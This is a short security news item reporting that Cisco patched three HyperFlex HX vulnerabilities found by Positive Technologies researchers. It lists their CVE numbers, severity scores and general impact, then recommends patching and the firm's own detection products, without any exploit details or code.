Cisco has fixed three vulnerabilities in Cisco HyperFlex HX, a hyperconverged platform for building IT infrastructure from scratch, Positive Technologies researchers have discovered.
Cisco HyperFlex HX in 2019 was named the leader in the Gartner Magic Quadrant for Hyperconverged Infrastructure.
Cisco has thanked Positive Technologies researchers Nikita Abramov and Mikhail Klyuchnikov for the two security advisories.
These vulnerabilities can negatively affect the internal infrastructure of an enterprise, leading to disruption of its operation. Hyperconverged systems are basically out-of-the-box data centers, combining storage systems, servers, network functions, and software into one module.
Nikita Abramov said: “By exploiting the flaws, attackers can access an organization’s IT infrastructure management system and affect its performance, delete important files, disrupt business processes, and erase backup systems with critical data—scenarios are limited only by the attacker’s imagination.”
An attacker needs to gain access to the web interface of the device and send a specific request in order to exploit the vulnerabilities. It’s difficult to estimate the number of vulnerable devices, since this type of equipment is most often located on an organization’s internal network.
Cisco has patched all three: CVE-2021-1497 (CVSS v3.1 score 9.8, discovered by Nikita Abramov), CVE-2021-1498 (scored 7.3, discovered by Mikhail Klyuchnikov), and CVE-2021-1499 (rated 5.3, discovered by Abramov and Klyuchnikov).
The report said the first two vulnerabilities are more dangerous, since their exploitation would allow attackers to execute arbitrary commands in the device’s operating system with maximum privileges (root user) and web server rights (Tomcat 8), respectively. The third vulnerability would allow cyber criminals to upload arbitrary files without authorization with limited write access, and is not as dangerous in comparison to the others.
Organizations should follow the recommendations specified in Cisco’s official notices to eliminate the vulnerabilities. Deep Network Traffic Analysis (NTA/NDR) systems, in particular PT Network Attack Discovery, will allow enterprises to detect attempts to exploit vulnerabilities in Cisco’s firewall.
In the case of a successful attack, one of the ways to detect signs of penetration is to use SIEM solutions (for example, MaxPatrol SIEM), which help identify suspicious behavior on the server, register an incident, and prevent the intruders from moving laterally within the corporate network in a timely manner.